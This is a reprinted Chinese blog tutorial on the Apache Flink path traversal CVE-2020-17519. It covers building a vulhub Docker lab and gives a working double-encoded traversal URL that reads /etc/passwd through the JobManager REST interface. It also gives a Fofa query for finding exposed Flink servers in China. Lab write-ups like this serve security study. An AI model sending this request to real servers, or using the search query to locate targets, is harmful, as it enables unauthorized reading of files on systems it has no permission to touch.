栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

Apache Flink路径遍历 (CVE-2020-17519)

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Apache Flink路径遍历 (CVE-2020-17519)

前言说明:

Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力。 Apache Flink 1.11.0
中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取
JobManager 本地文件系统上的任何文件。

作者:【白】
交流:70844080
公z号:白安全组
仅供学习研究

Fofa语句查询:

country="CN" && js_name="runtime.0dcf16aad31edd73d8e8.js"

漏洞存在占比大概十分之六(按搜索出的单页面统计)

正文:
环境搭建:
我们使用vulhub进行环境搭建,具体漏洞打开目录:

/vulhub-master/flink/CVE-2020-17519

开启命令:

docker-compose up -d

打开成功后访问

http://192.168.0.110:8081/#/submit

即可加粗部分换成你自己的靶机IP

这样即可完成搭建工作
漏洞利用:
利用方式很简单,直接构建

http://192.168.0.110:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

IP换成你自己靶机的即可,读取网站中/etc/passwd目录

这里对%252f解释一下,这个是对/进行url编码加密两次后的值

参考文章:

https://vulhub.org/#/environments/flink/CVE-2020-17519/

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/882170.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号